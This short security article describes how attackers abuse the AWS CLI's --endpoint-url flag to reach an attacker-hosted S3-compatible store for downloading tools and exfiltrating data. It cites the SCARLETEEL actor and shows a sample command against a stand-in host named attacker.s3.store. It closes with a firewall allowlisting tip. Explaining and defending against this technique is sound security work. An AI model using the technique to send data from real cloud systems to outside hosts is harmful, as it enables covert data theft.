Article by Nick Frichette.

Download Tools and Exfiltrate Data with the AWS CLI

In an attempt to be stealthy, threat actors will often "live off the land", using tools and scripts already existing on a host machine outside of their intended purpose. This can help them avoid detection by blending in with their surroundings.

In AWS environments, it is common to find servers which have the AWS CLI installed (It is included by default in Amazon Linux). This makes it an excellent choice for adversaries to move data around, avoiding more common tools like curl or Wget which may be monitored for suspicious uses.

As seen in the wild by the SCARLETEEL threat actor, the AWS CLI can be used to download and exfiltrate data using an attacker-hosted backend. You can host an S3 compatible object store such as MinIO and then use the --endpoint-url flag to interact with that service. This makes it easy to download tools, exfiltrate compromised data and more.

$ aws s3 ls --endpoint-url https://attacker.s3.store
2023-07-13 02:06:30 criminalbucket
2023-07-13 22:01:36 exfiltrated-data

Tip

As mentioned by Jesse Lepich, a layer 7 firewall like the AWS Network Firewall can be used to limit access to non-allowlisted domains.